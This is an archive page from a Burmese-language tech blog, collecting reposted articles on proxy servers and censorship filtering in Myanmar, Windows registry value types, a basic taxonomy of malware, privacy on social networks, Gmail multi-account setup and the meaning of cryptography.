Tuesday 25 December 2012

Proxy အကြာင်းသိကောင်းစရာ

Proxy Server ဆိုတာ ဘာလဲ
About Proxy Proxy Server ဆိုတာ ဘာလဲ Proxy Server ဆိုတာ သင့်ကွန်ပျူတာနဲ့ အင်တာနက်ကြားမှာ တည်ရှိပြီး အင်တာနက်က သတင်းအချက်အလက် တော်တော်များများကို ထိန်းသိမ်းထားပါတယ်။ ကျွန်တော်တို့က Website တစ်ခုကို ကြည့်တဲ့အခါ အရင်ဆုံး Proxy Server ဆီကို request ရောက်သွားပါတယ်။ Proxy Server က သူ့ဆီမှာ ကျွန်တော်တို့တောင်းဆိုတဲ့ Website ရှိရင် ပြန်ပို့ပေးလိုက်ပါတယ်။ ဒါကြောင့် အင်တာနက်သုံးစွဲရတဲ့သူအဖို့ ပိုပြီးမြန်တဲ့ကောင်းကျိုးကို ခံစားရပါလိမ့်မယ်။ ဒါပေမဲ့ မြန်မာပြည်က Proxy Server တွေဟာ အဲဒီလို Cache လုပ်တာထက် Website Filtering အတွက်ပဲ လုပ်ထားသလားလို့တောင် ထင်ရပါတယ်။ ဒါ့အပြင် မြန်မာပြည်မှာ ရှိတဲ့ တစ်ချို့ Proxy Server တွေဟာ မူရင်း Website က Update လုပ်လိုက်တာတောင် သူတို့က Update မလုပ်နိုင်သေးပါဘူး။ Technical အရ ပြောရရင်တော့ TTL (Time To Live) တန်ဖိုးကို အများကြီး ပေးထားတယ်နဲ့ တူပါတယ်။ Web Filtering လုပ်မထားတဲ့ Proxy Server တွေ မြန်မာပြည်မှာ ရှိပေမဲ့ သုံးတဲ့အခါ username နဲ့ password တောင်းတာကို တွေ့ရပါတယ်။ (ygncache2.mpt.net.mm ပါ)

Anonymous Proxy Server ဆိုတာဘာလဲ 
Website တော်တော်များများဟာ ယုံလို့မရပါဘူး။ သူတို့ဟာ ကျွန်တော်တို့ရဲ့ IP ကို အသုံးပြုပြီး ကျွန်တော်တို့ရဲ့ ကွန်ပျူတာ Hard Disk ထဲက အချက်အလက်တွေကိုတောင်မှ လှမ်းခိုးနိုင်ပါတယ်။ အဲဒီလို လုပ်ဖို့အတွက်ကလည်း အလကားရတဲ့ Hacking program လေးတွေကို သုံးပြီး လုပ်နိုင်ပါတယ်။ Anonymous Proxy Server တွေဟာ ကျွန်တော်တို့ရဲ့ IP ကို ဖျောက်ပေးနိုင်ပါတယ်။ ဒါကြောင့် ကျွန်တော်တို့ဟာ အချက်အလက်ခိုးယူနိုင်တဲ့ Website ကို ကြည့်ရင်တောင်မှ ကျွန်တော်တို့ရဲ့ IP ကို အဲဒီ Site ဟာ မသိနိုင်ပါဘူး။ Anonymous Proxy Server တွေကပဲ အဲဒီလို user ရဲ့ IP ကို ဖျောက်ပေးနိုင်ပြီး သာမန် Proxy Server တွေကတော့ ကျွန်တော်တို့ရဲ့ IP ကို target Server ဆီကို ပို့ပေးလေ့ရှိပါတယ်။
Free Proxy Server ဆိုတာဘာလဲ Free Proxy Server ဆိုတဲ့အတိုင်းပါပဲ။ Free ရတယ်၊ လူတိုင်းသုံးလို့ရပါတယ်။ နိုင်ငံတော်တော်များများမှာ Free Proxy Server များစွာရှိပေမဲ့ တော်တော်များများဟာတော့ Anonymous Proxy Server တွေ မဟုတ်ကြပါဘူး။

Proxy Server အမျိုးအစားများ
HTTP Proxy Proxy ဆိုတာ Server သက်သက်ပါပဲ။ ဘာ Proxy လဲဆိုတာ သိမှ ကိုယ့်အတွက် အသုံးဝင်မှာပါ။ HTTP Proxy ရဲ့ အကူအညီနဲ့ Web Pages တွေ ကြည့်နိုင်မယ်၊ download ဆွဲနိုင်ပါမယ်။ အခုနောက်ပိုင်းမှာတော့ Program တွေကလည်း HTTP Proxy တွေနဲ့ တွဲအလုပ်လုပ်နိုင်ပါပြီ။ ဥပမာ ICQ လို Chat Program တွေပါ။

SOCKS Proxy 
သူကတော့ ပိုအစွမ်းထက်ပါတယ်။ အင်တာနက်ပေါ်မှာရှိတဲ့ ဘယ် Information ဆိုရင် ဘယ်လို လွှဲယူပေးရမယ်ဆိုတာ သိပါတယ်။ အဓိကကတော့ TCP/IP Protocol နဲ့ ကောင်းကောင်းကြီး အလုပ်လုပ်နိုင်တာပါ။ ဒါပေမဲ့ SOCKS Proxy ကို သုံးမယ်ဆိုရင်တော့ အဲဒီ Proxy Server ဟာ SOCKS 4 လား SOCKS 5 ဆိုတာ သိဖို့ လိုပါလိမ့်မယ်။

CGI Proxy  
CGI Proxy ဟာ Browser ကနေပဲတစ်ဆင့် access လုပ်နိုင်တဲ့ Proxy Serve ဖြစ်ပါတယ်။ ကျွန်တော်တို့တွေ သုံးနေကြတဲ့ ကျော်တဲ့Website ဆိုတာ အဲဒီ CGI Proxy ကိုပြောတာပါပဲ။
FTP Proxy FTP Proxy ကတော့ FTP Server တွေနဲ့ တွဲအလုပ်လုပ်နိုင်ဖို့ ဖြစ်ပါတယ်။ CuteFTP လို GetRight တို့တွေမှာ FTP Proxy တွေ ထည့်သုံးလို့ ရပါတယ်။ မြန်မာနိုင်ငံက Proxy တွေမှာ FTP Proxy တွေ ရှိပေမဲ့ Public အတွက်တော့ ပိတ်ထားပါတယ်။ ဒါကြောင့် ကျွန်တော်တို့တွေ FTP သုံးချင်ရင်တော့ နိုင်ငံခြားက FTP Proxy တွေ လှမ်းသုံးရင်တော့ ရနိုင်ပါတယ်။ (လက်တွေ့တော့ ကျွန်တော်လည်း မစမ်းဖူးပါ)

Proxy Server သုံးလို့ ရတဲ့ အကျိုးကျေးဇူး 
အဓိကကတော့ ကိုယ်ကြည့်နေတဲ့ Site, ကိုယ်သုံးနေတဲ့ Mail, ကိုယ်သုံးနေတဲ့ Web Chat တွေက ကိုယ်ဘယ်ကလဲ ဆိုတာ မသိတော့တာပါပဲ။ အဲဒီတော့ ကိုယ့် information အတွက် လုံခြုံမှုရှိပါတယ်။ မြန်မာပြည်မှာ အဲဒါက ဖန်တီးပြီးသားပါ။ ကျွန်တော်တို့တွေ ဘယ် site ပဲကြည့်ကြည့် သူတို့က ကျွန်တော်တို့ IP ကို မသိပါဘူး။ data မခိုးနိုင်ပါဘူး။ ဒီမှာတော့ Proxy ဆိုရင် ကျော်ဖို့ပဲလို့ကို ထင်နေကြတော့ပါ။ ကျွန်တော်တို့နိုင်ငံရဲ့ Proxy က Web Filtering လုပ်ထားတယ်၊ တခြားနိုင်ငံက Proxy က Web Filter လုပ်မထားဘူး၊ အဲဒီတော့ ကျွန်တော်တို့က အဲဒီ Proxy ကို သုံးလိုက်ရင် အလိုလို ကျော်ပြီးသား ဖြစ်သွားတာပါ။ တခြား Proxy တွေ သုံးတယ်ဆိုတာကလည်း အရမ်းခက်ခဲတာမဟုတ်ပဲ ကိုယ်သုံးနေတဲ့ Browser ရဲ့ Option ထဲမှာ Proxy Server ဆိုတဲ့ နေရာမှာ ကိုယ်သုံးချင်တဲ့ Proxy Server ရဲ့ IP ကို ရိုက်ထည့်လိုက်ရုံနဲ့ ရပါတယ်။ ဒါပေမဲ့ တခြားနိုင်ငံက Proxy ကို လှမ်းသုံးဖို့ဆိုတာ အဲဒီလောက်ကြီးထိလည်း မလွယ်ပါဘူး။ (CGI Proxy တွေကို မဆိုလိုပါ)

ဘယ်လို ပြဿနာတွေ ကြုံနိုင်လဲ ဆိုတော့
(၁) ကိုယ့်နေရာနဲ့ ကိုယ့်သုံးတဲ့ Proxy နဲ့ အရမ်းဝေးနေတဲ့အခါ နှေးတာတွေ၊ ချိတ်ဆတ်မရတာတွေ ဖြစ်တတ်ပါတယ်။
(၂) ကိုယ်သုံးတဲ့ Proxy ဟာ ကိုယ်ဟာ မြန်မာပြည်ကမို့ သုံးခွင့်မပေးတာမျိုးလည်း ရှိတတ်ပါတယ်။
(၃) တချို့ Proxy Server တွေကတော့ IP နဲ့ ကန့်သတ်ထားတာမျိုးလည်း ရှိပါတယ်။ ကိုယ့် IP က သူတို့ list ထဲမှာ မပါရင် သုံးမရတာမျိုး ဖြစ်ပါတယ်။
(၄) အဓိကကတော့ ကျွန်တော်တို့ရဲ့ ISP က ကျွန်တော်တို့သုံးမဲ့ Proxy Server တွေကို Access Denied လုပ်ထားတာလည်း ဖြစ်လေ့ရှိပါတယ်။ အဲဒါက အများဆုံးပါ။ source: IT men

အပြည့်အစုံ

Virus အကြောင်းများ

About Virus Value Value တစ်ခုမှာရှိတဲ့ Data တစ်ခုကိုဖော်ပြတဲ့နေရာမှာ Data type အမျိုးအစား (၆)မျိုးအနက်က တစ်ခုခုနဲ့ဖော်ပြနိုင်ပါတယ်။ အဲ့ဒီ (၆) မျိုးကတော့
About Virus Value
Value တစ်ခုမှာရှိတဲ့ Data တစ်ခုကိုဖော်ပြတဲ့နေရာမှာ Data type အမျိုးအစား (၆)မျိုးအနက်က တစ်ခုခုနဲ့ဖော်ပြနိုင်ပါတယ်။ အဲ့ဒီ (၆) မျိုးကတော့ ...........

1.REG_BINARY
Raw Binary Data, Hardware သတင်းတွေကို ကွန်ပျူတာမှ binary အဖြစ်သိမ်းပေမယ့်၊ Registery editor မှာ အကျဉ်းခြုံးရန် Hexa Decimal နဲ့ပြပေးတယ်။

2.REG_DWORD
4 byte အရှည်ရှိတဲ့ ကိန်းဂဏန်းနဲ့သိမ်း၊ Device Driver များ၊ Service နှင့်သက်ဆိုင်သော
ကန့်သတ်ချက်(parameter) များကိုဖော်ပြပေးတယ်။

3.REG_EXPAND_SZ
ကိန်းရှင် (variable) များ

4.REG_MULTI_SZ
multiple type, user များသိနိုင်သော Char နှင့် ဂဏန်းများရောနှောပုံ၊ နေရာလွတ်၊ ကော်မာနဲ့ အခြားအမှတ်တွေပါ။

5.REG_SZ
စာသားများပါဝင်ပြီး အလျားသတ်မှတ်ချက်ရှိသော အက္ခရာစဉ်ကိန်းတန်း တစ်ခု။

6.REG_FULL_RESOCE_DESCRIPTOR
Hardware တစ်ခုကို (Dirver တစ်ခု) Resource List ကိုသိမ်းဆည်းရန် ဒီဇိုင်းထုတ်ထားသော Nested Array တစ်ခုတို့ပဲ ဖြစ်ပါတယ်။

About Virus (No-1)

ဗိုင်းရပ်စ် ဆိုသည်မှာ (ပထမပိုင်း)


ဗိုင်းရပ်စ်ဆိုသည်မှာ လို့ခေါင်းစဉ်တပ်ထားတာ ကျွန်တော်လဲ သိသလောက်လေး ပြောပြပေးတာပါ။  General Knowledge ပေါ့ဗျာ….. ကဲ ဖတ်ပေးဦးဗျာ………. အကျိုးရှိမှာပါ…
လူတွေရော အားလုံးပါပဲ တစ်ခုခုဆို Virus လို့ပဲ သိပါတယ်။ တကယ်တော့ Virus အနွယ်ဝင် အမျိုးအစားများရှိနေပါတယ်။ အဲဒါတွေအကြောင်း ရှင်းလင်းပြထားတဲ့ မူလရေးသားသူ ဆရာမျိုးသူရ အားအထူး ကျေးဇူးတင်ရှိပါတယ်။

၁။ Computer Virus
Computer virus ဆိုတာ သူ့ကိုသူ attach လုပ်ထားတဲ့ program (သို့) file တစ်ခုဖြစ်ပြီး ကွန်ပျူတာတစ်ခုကနေ တစ်ခုကို ပြန့ှ်နှံ့ကူးစက်နိုင်ပါတယ်.. လူတွေမှာ Virus ကူးသလိုပဲ ပြန့်နှံ့ပြီးတော့ ကွန်ပျူတာရဲ့ System ကိုပုံမှန်အလုပ် မလုပ်အောင် နှောက်ယှက်မယ်၊ Windows ကို Error တွေများလာအောင် လုပ်မယ်၊ user data တွေကို ဖျက်ဆီးမယ်၊ Hardware တွေ Software တွေ အရေးကြီးတဲ့ File တွေကို ဖျက်ဆီးမယ်... စတာတွေကို လုပ်ဆောင်ပါတယ်။ ဒါပေမယ့် Virus အများစုဟာ executable fileတွေဖြစ်ကြပါတယ်.. ဥပမာ.. chrome.exe, system.bat , flashy.com စသဖြင့်ပေါ့ .. သူတို့ဟာ ကွန်ပျူတာထဲမှာ ရှိနေရင်တောင်မှ သင်ကိုယ်တိုင်မှ သွားမဖွင့်ရင်/ သွားမ run မိရင် ကွန်ပျူတာကို ဘာမှ မထိခိုက်နိုင်ပါဘူး... ဒါကြောင့် မှတ်ထားရမှာက လူ၏ လုပ်ဆောင်ချက်မပါဝင်ပဲ Computer Virus သည် မပျံ့နှံ့ မကူးစက်နိုင်ပါ။ Virus ပျံ့နှံ့နိုင်တဲ့ နည်းလမ်းတွေကတော့ အမျိုးမျိုးရှိပါတယ်...forward E-mail က attached file တွေ၊ memory stick(flash/thumb drives) တွေ၊ Full sharing ကနေ virus infected file ထည့်တာတွေ၊ သူငယ်ချင်း အချင်းချင်း မသိပဲနဲ့ Virus infected file ကို share လုပ်မိတာတွေ .. စသဖြင့်ပေါ့...ဗျာ

၂။ Malware

Malware ဆိုတာ အင်္ဂလိပ်စကား ၂ လုံး Malicious Software ကိုပေါင်းစပ်ပြီး ကွန်ပျူတာ ပညာရှင်တွေက အလွယ်ခေါ်ကြတဲ့ virus လို program တွေပါပဲ.. အဲဒိ Malware ကကွန်ပျူတာပိုင်ရှင်ရဲ့ ခွင့်ပြုချက်မရပဲ ၊ မသိစေပဲ single computer / server / computer network ထဲ ၀င်ပြီး ကွန်ပျူတာ System ပျက်ဆီးစေနိုင်အောင် ၊ အနှောက်အယှက်ဖြစ်အောင် ရေးလေ့ရှိကြပါတယ်.. Malware တစ်ခုမှာ Computer VIrus , worms, trojan horses, most rootkits, spyware, dishonest adware, crimeware and other malicious and unwanted software တွေပါဝင်လေ့ရှိပါတယ်..

၃။ worm

worm ဆိုတာက virus နဲ့ ဆင်တူအောင် ရေးထားကြတာပါပဲ။ virus တစ်ခုရဲ့ Sub-class လို့လည်း ခေါ်လို့ရပါတယ်။ သူကတော့ Virus လို လူကဖြန့်မှ ပျံ့တာမျိုးမဟုတ်ပဲ သူပါသူ Computer network ထဲမှာရှိတဲ့ အခြားကွန်ပျူတာတွေကို လူရဲ့လုပ်ဆောင်ချက် လုံးဝမပါပဲနဲ့ ပျံ့နှံ့စေတာဖြစ်ပါတယ်။ သူ့ပါသူ ဖြန့်နိုင်တဲ့ စွမ်းရည်ရှိတာပေါ့နော်။ အကြီးမားဆုံး အန္တရာယ်ကတော့ သူက သူ့ပါသူ System file တစ်ခုလို အယောင်ဆောင်ပြီး သူ့ကိုယ်သူ သန်းပေါင်း ၁၀၀ လောက် copy ပွားနိုင်ပါတယ်။ Hard disk ရဲ့ used space ကို များလာစေတယ်..Computer ရဲ့ System memory usage တွေ များလာစေတယ်။ network bandwidth တွေကိုတက်လာစေတယ်။ Run ထားတဲ့ program တွေကို not responding ခဏခဏဖြစ်လာစေတယ်။ လူသိများတဲ့ worm ကတော့ Blaster worm ပါ။ ထွင်လိုက်တဲ့လူကတော့ ၂၀၀၅ ခုနှစ်တုန်းက အသက် ၁၈နှစ် အရွယ် Jeffrey Lee Parson ဖြစ်ပြီး ထောင် ၁၈ လ ကျသွားခဲ့ပါတယ်။ Blaster worm က windows စတက်တာနဲ့ Registry ကီး HKEY_LOCAL_MACHINE\SOFTWARE\ Microsoft\Windows\CurrentVersion\ Run\windows auto update = msblast.exe မှာ နေရာယူပါတယ်။ msblast.exe ဆိုတာကတော့ နာမည်တူပေးထားတာပေါ့။ Blaster worm က Computer System ထဲမှာ ရှိနေပြီဆိုတာနဲ့ Cracker တွေက ကွန်ပျူတာကို Remote လုပ်ပြီး ထိန်းချုပ်နိုင်အောင် ရေးထားပါတယ်။
About Virus (No-2)
ဗိုင်းရပ်စ်ဆိုသည်မှာ (ဒုတိယပိုင်း)

၎။ Trojan horse

Trojan horse ကို Trojan လို့လည်းခေါ်ပါတယ်။ Trojan ဆိုတဲ့ မြင်းရုပ်ကြီးအကြောင်း ငယ်ငယ်က ကမ္ဘာ့သမိုင်းမှာသင်ဖူးကြမှာပေါ့။ Tri ဇာတ်ကားလည်း ကြည့်ဖူးကြမှာပါ။ အဲဒိထဲကလိုပဲ အလုပ်လုပ်တယ်လို့ပြောလို့ရပါတယ်။ ပုံမှန်အားဖြင့် အသုံးဝင်တဲ့ Software တွေမှာ ထည့်ထားတတ်ကြပါတယ်။ ဥပမာပေါ့ဗျာ... Game တစ်ခုကို Install ပြီးဆော့နေပေမယ့် အခြားတစ်ဖက်မှာ Hacker တွေ Cracker တွေက ကွန်ပျူတာထဲကို ၀င်မွှေနေလို့ရအောင်လုပ်ပေးနေတယ်။ အဲဒီတော့ အဲဒိ Game ကို Trojan horse လို့ခေါ်တာပေါ့။ တစ်ကယ်တော့ Game က တရားဝင်ထုတ်ထားတဲ့ Game ပဲ.. ဒါပေမယ့် Virus infected ဖြစ်နေတဲ့ Game လို့ပြောရလိုဖြစ်နေတာပေါ့။ နမူနာ Trojan Horse ကတော့ waterfalls.scr ဆိုတဲ့ free waterfall screen saver ပဲဖြစ်ပါတယ်။
Trojan horse တစ်ခုဟာ အောက်ပါအချက်များကို လုပ်ဆောင်ပေးနိုင်ပါတယ်...
* Remote Access
* Data Destruction
* Downloader/dropper
* Server Trojan(Proxy, FTP , IRC, Email, HTTP/HTTPS, etc.)
* Disable security software
* Denial-of-service attack (DoS)

၅။ Spyware
သူကတော့ သူခိုးပေါ့နော်.. Spy တွေ ဘယ်လို အလုပ်လုပ်သလဲဆိုတာ သိကြမှာပါ။ သူက ကွန်ပျူတာကို ထိခိုက်ဖျက်ဆီးချင်မှ ဖျက်ဆီးမယ်  ဒါပေမယ့် ကွန်ပျူတာမှာသုံးနေတဲ့ user ရဲ့ အမျိုးမျိုးသော အချက်အလက်တွေ၊ အရေးကြီးတဲ့ Data တွေကို သူ့ရဲ့ Main server တစ်ခုခုကို နေ့စဉ် သတင်းပို့ပေးနေတယ်။ Spyware တွေက များသော အားဖြင့် Web browser တွေကနေ ၀င်နိုင်ပါတယ်။ ပြီးရင် သူက Browser home page ကိုပြောင်းထားတတ်ပါတယ်။ သင့်ကို Error message တွေ အမျိုးမျိုးပြမယ်..(ဥပမာ- သင့်ကွန်ပျူတာမှာ problems တွေများနေပြီ..အဲဒါတွေပြင်ချင်ရင် အောက်ကခလုတ်ကို နှိပ်ပါ) စသဖြင့် ဆွဲဆောင်မယ်၊ သင်က link တစ်ခုကို click လိုက်ပေမယ့် သင်မဖွင့်ပဲနဲ့ အခြား Porn Site တွေ အလိုလိုပွင့်လာမယ် စသဖြင့်ပေါ့ဗျာ။ တစ်ချို့ လူတွေက http cookie တွေကို Spyware တွေလို့ ထင်ကြပါတယ်။ တကယ်တော့ မဟုတ်ပါဘူး ဒါပေမယ့် အဲဒိ cookie ထဲမှာ Spyware က track လုပ်နိုင်တဲ့ Data တွေ ပါလာတတ်တာကြောင့်  Spyware Remover တော်တော်များများက Cookie တွေကို ဖျက်ပစ်ကြတာပါ။ Spyware ကို ကာကွယ်ချင်ရင်တော့ pop-ups ကျလာတဲ့ link တွေကို ရှောင်တာကောင်းပါတယ်... Free Spyware Remover တွေနဲ့လည်း ကာကွယ်နိုင်ပါတယ်။

၆။ Adware
Adware ဆိုတာကတော့ Advertising-supported software (သို့) software package တစ်ခုဖြစ်ပါတယ်။ သူကတော့ Screen မှာ Automatic ပေါ်လာအောင် ဖန်တီးထားပြီး Download အတင်းလုပ်ခိုင်းပါတယ်။ အချို့သော Adware များဟာ Spyware များဖြစ်တတ်ကြပါတယ်။

၇။ Crimeware
Crimeware ဆိုတာကတော့ Spyware, Adware, Malware အမျိုးအစားတွေထဲမှာပါပါတယ်။ သူ့ရဲ့ရည်ရွယ်ချက်ကတော့ financial crime တွေအတွက် ရည်ရွယ်ပြီး ရေးကြတာများပါတယ်။ သူက user password တွေ၊ links တွေ၊ အချက်အလက်တွေကို မှတ်သားထားနိုင်ပြီး သူ့ကို Run ထားတဲ့လူက ပြန်ဖွင့်ကြည့်ပြီး user data တွေကို ခိုးယူနိုင်တာပေါ့။ ဥပမာပြောရရင်
ခုခေတ်စားနေတဲ့ key logger တို့ keystroke logging software တို့ဟာ Crimeware အမျိုးအစားတွေပဲဖြစ်ပါတယ်။
Source; http://bonemyathein.blogspot.com/p/virus.html























































 

အပြည့်အစုံ

Social Network ဆိုတာဘာလဲ

Web 2.0 ခေါ် Social Network ဆိုတာဟာ လူတိုင်းနီးပါး၊ လူငယ်တိုင်းလိုလို ကြားနေရတဲ့ ခေတ်ပေါ် အခေါ်အဝေါ်တစ်ခုပါ။
အင်တာနက်ပေါ်မှာ လူအများနှင့် ချိတ်လို့ရတဲ့ နေရာပေါ့။ မိုဘိုင်းလ်ဖုန်းနှင့်လည်း သုံးလို့ရတယ်။ နည်းပညာ တစ်ခေတ်စမ်းထမှုပေါ့။ ၀ါသနာတူရာ စိတ်ဝင်စားတဲ့ နယ်ပယ်အလိုက်ကို မိတ်ဆွေဖွဲ့ပြီး ဆုံဆည်းရာ ရပ်ဝန်းနယ်ပယ် တစ်ခုလို့ပြောရင်လည်း မှားမယ်မထင်ပါဘူး။

Freedom is not free လို့ပြောကြတာ ရှိသလို free ရတိုင်းလည်း တကယ်တော့ free မဖြစ်ဘူး။ တကယ့်လောကမှာ free ဆိုတာ မရှိပါဘူး။ အပေးအယူတွေချည်းပါဘဲ။

Social Network Site တွေမှာ အဖွဲ့ဝင်လုပ်လိုက်တာနှင့် ကိုယ့်ရဲ့အချက်အလက်တွေဟာ အဲဒီဝက်ဆိုက်ပိုင်ရှင် ဆီကို ရောက်သွားပြီ။ သူကြိုက်သလို စီမံနိုင်ခွင့်ကို သဘောတူလို့ free သုံးလို့ရတာပေါ့။ အခုနောက်ပိုင်း account အသစ်တွေတောင်မှ သတ်သတ်လုပ်စရာ မလိုတော့ဘဲ ကိုယ့်ရဲ့ email ID နှင့် password ကိုပဲ သုံးပြီး ၀င်လို့ရတဲ့ social site တွေ အများကြီးရှိလာပါပြီ။

Campaign လုပ်တာဖြစ်ဖြစ် အများသိအောင်ဖြန့်ရမယ့် သတင်းတွေကို ဖြန့်ချင်တဲ့အခါမှာ ကိုယ့် email ထဲကိုဝင်ပြီး ကိုယ်တိုင်စာပို့စရာ မလိုတော့ဘူး။ Social Site တွေကနေ form လေးလုပ်ပေးထားတာလေးကို ဖြည့်ပြီးတော့ အဲဒီမှာ ကိုယ့်နာမည်၊ email ID နှင့် email password ကို ထည့်လိုက်တာနှင့် ကိုယ့်ရဲ့ email ထဲက contact မှာ ရှိရှိသမျှသူတွေဆီကို ကိုယ့် email ကိုယ့် နာမည်နှင့် စာပို့ပေးပါတယ်။

Website တွေ blog တွေ social site တွေ အများကြီးကို ဘာဖြစ်လို့ free ဖြစ်နေတာလည်းဆိုတာ စိတ်ဝင်စားစရာကောင်းပါတယ်။

Social site ဖြစ်ဖြစ် free ရတာတွေရော ၀ယ်ရတာတွေရော သုံးတဲ့အခါတိုင်း agreement (သဘောတူချက်) ကို သဘောတူကြောင်း နှိပ်ပြီးမှသာ သုံးခွင့်ရတာပါ။ ဒါပေမယ့် တော်တော်များများကတော့ အဲဒီထဲမှာ ဘာတွေပါတယ်ဆိုတာ မဖတ်ကြဘူး။ ဖတ်လည်း နားမလည်းဘူးပေါ့။

အဲဒီ free ၀န်ဆောင်မှု ပေးတဲ့သူတွေမှာလည်း ကြီးကြီးမားမား ကုန်ကျစရိတ်တွေရှိပါတယ်။ အဲတာတွေအတွက် ၀င်ငွေပြန်ရအောင် လုပ်ရပါတယ်။ အဲတာကို user တွေက သဘောတူလို့ free သုံးခွင့်ရတာပါ။

Social Network Site တွေဟာ ထုတ်လုပ်သူ လုပ်ငန်းရှင်တွေအတွက်သူတို့ ရောင်းကုန်ကို ကြော်ငြာဖို့ ပစ်မှတ်ဖြစ်လာသလို ကြော်ငြာလုပ်ငန်းရှင်တွေ အတွက်လည်း ပစ်မှတ် ဖြစ်လာတယ်။ ကြားခံကြော်ငြာနှင့် ၀င်ငွေရှာတဲ့ သူတွေအတွက်လည်း အဓိက ၀င်ငွေရတဲ့ နေရာဟာ Social Network Site တွေလို free ၀န်ဆောင်မှုပေးတဲ့ site တွေပါဘဲ။

အဲဒီဝက်ဆိုက်တွေကို ၀င်လိုက်တာနှင့် ကိုယ့် email အပါအ၀င် username နှင့် password တွေကိုပါ ပေးလိုက်ရတာပါ။ ကိုယ်သုံးနေတဲ့ ၀န်ဆောင်မှုကို ပေးတဲ့ဆိုက်တွေက သူတို့ကြော်ငြာစရာရှိရင် ကိုယ့် email နှင့် ကိုယ့် contact အားလုံးဆီကို ပို့လိုက်လို့ရတယ်။ ကိုယ့်အချက်အလက်တွေ သူများကို ပြန်ရောင်းလို့လည်း ရသေးတယ်။

အင်တာနက်ပေါ်မှာ အားတိုင်း ကလေ့ချင်တဲ့ သူတွေ သတိထားစရာပါ။ ကိုယ့်ရဲ့ privacy နှင့် လုံခြုံမှုကို တန်ဖိုးထားချင်ရင်တော့ သတိထား သုံးရမှာ ဖြစ်ပါတယ်။ တကယ်လို့ သုံးတော့မယ်ဆိုရင်လည်း email ID သီးသန့်တွေနှင့် အသုံးပြုသင့်ပါတယ်။ username နှင့် password တွေလည်း တစ်ခြားဟာတွေနှင့် မတူအောင် သုံးသင့်ပါတယ်။ ကိုယ်ရေး အချက်အလက်တွေကိုလည်း ကိုယ်မှတ်မိနေမယ့် အမှားတွေသာ ပေးသင့်တယ်။

Email ID အများကြီးသုံးသူတွေအတွက် account တစ်ခုထဲကနေတခြား email တွေ ဘယ်လိုကြည့်လို့ရတယ် ဆိုတာ ဒီဆောင်းပါး (Master Email account ဘယ်လိုသုံးမလဲ) မှာ ဖတ်နိုင်ပါတယ်။ (burmait.net မှ ကူးယူဖော်ပြပါသည်။)

အပြည့်အစုံ

Master Email account ဘယ်လိုသုံးမလဲ

ဒီလို email ကို ဆိုင်ရာဆိုင်ရာအတွက် (Email လုံခြုံရေး ဘယ်လိုလုပ်မလဲ ဆောင်းပါးကို ဖတ်နိုင်ပါတယ်) သုံးဖို့ account တွေ အများကြီး လုပ်ထားတော့ အင်တာနက်ဆိုင်တွေမှာ email check တဲ့ အခါမှာ
အချိန်တွေ အများကြီးကုန်နိုင်ပါတယ်။ တစ်ခုဝင်လိုက် ဖတ်လိုက် ထွက်လိုက်နှင့်ပေါ့။ ဒီလို မဖြစ်ရလေအောင် master email account တစ်ခု ထားပြီးတော့ တစ်နေရာထဲကနေ ကိုယ့်ရဲ့ email account တွေ အားလုံးကို ဖတ်တာ၊ စာပြန်ရေးတာ ဖြစ်ဖြစ် လုပ်နိုင်ပါတယ်။

ကိုယ့်ရဲ့ Master email account ထဲကနေ Mail Setting/Accounts and Import/Check mail using POP3/Add POP3 Email Account ကနေ ကိုယ်ကြည့်ချင်တဲ့ email ID တစ်ခုချင်း ထည့်ရပါမယ်။ အဲဒီမှာ username ရယ် password ရယ် ထည့်ပြီး Always use SSL ရယ် Lable incoming message ရယ် Archive incoming message ရယ်ကို ရွေးချင်ရင် ရွေးလို့ရတယ်။ တစ်ခြား web browser ကနေပြီးတော့ ဒီ Master account မှာ ထည့်မယ့် email ID (slave acccount) ထဲကိုဝင်ပြီးတော့ mail setting/forwarding and POP/IMAP အောက်က POP download မှာ enable ဆိုတဲ့ ရွေးချယ်စရာ တစ်ခုခုကို ရွေးပြီး အောက်မှာ Save Changes ကို နှိပ်ရပါမယ်။ ပြီးတော့မှ Master email ID ဖွင့်ထားတဲ့ browser ကိုပြန်သွားပြီး Add account ကိုနှိပ်ရမယ်။

ရပြီဆိုရင် နောက်တဆင့်မှာ Yes... ရွေးစရာကို ရွေးပြီး send verification ကို ထပ်နှိပ်ရပါမယ်။ ဒါက နောင်ဆုံး အတည်ပြုချက် ရယူတာဖြစ်တယ်။

ခုနက slave email account ထဲကို ပြန်သွားပြီး ရောက်လာတဲ့ အတည်ပြုချက် code number ကို ယူပြီး master account မှာ ထည့်လိုက်တော့မှ ဒီလုပ်ဆောင်ချက်ဟာ အောင်မြင်မှာဖြစ်တယ်။ တကယ်အလုပ် လုပ်မလုပ်ကိုတော့ စမ်းကြည့်လိုက်ပါအုံး။ မရရင်တော့ တနေရာရာမှာ မှားတာရှိလို့ ဖြစ်မှာပါ။ မရရင် ပြန်မေးကြည့် လိုက်ပါနော်။

ဒီလိုနဲ့ slave email ID(s) ထဲမှာ ၀င်လာသမျှ email အသီးသီးဟာ Master email account ထဲမှာချက်ချင်းရောက်နေပြီး ဖတ်လို့ရပါတယ်။ ပြန်ပို့တဲ့ အခါမှာလည်း ကြိုက်တဲ့ email ID နှင့် ပြန်ပို့လို့ ရပါတယ်။ Slave email ID နှင့် Master account ထဲကနေ email စာ အသစ် ရေးဖို့ဆိုရင် Gmail ကိုသုံးတဲ့ အချိန်မှာ standard version နှင့် သုံးဖို့လိုအပ်ပါတယ်။ From ဆိုတဲ့ နေရာကနေ ဘယ် email ID နှင့် ပို့ချင်သလဲ ရွေးလို့ရတယ်လေ။

Standard version မှာ Functions တွေပိုစုံတယ် အင်တာနက် ချိတ်ဆက်မှု အမြန်နုန်းလည်း ပိုကောင်းဖို့ လိုအပ်ပါတယ်။

အဲဒါကတော့ ကိုယ့် email account အသီးသီးကို Master ID တစ်ခုထဲမှာ backup လုပ်တာဖြစ်တယ်။ အဲဒီ Master account ကိုလည်း တစ်ခြား ID သို့ ထပ်ပြီး Backup လုပ်လို့ရပါသေးတယ်။
(burmait.net မှ ကူးယူဖော်ပြသည်။)

အပြည့်အစုံ

Cryptography ရဲ့ အဓိပ္ပာယ်


သတင်း အချက်အလက်လုံခြုံရေး သိပ္ပံပညာကို ခေါ်ဆိုတဲ့ စကားလုံးဖြစ်ပါတယ်။ ဂရိစကားလုံးဖြစ်ပါတယ်။ ဂရိစကားလုံး kryptos ကဆင်းသက်လာတဲ့ ဝေါဟာရဖြစ်ပြီး၊ ထိန်ချန်ထားသော အဓိပ္ပာယ်ရပါတယ်။
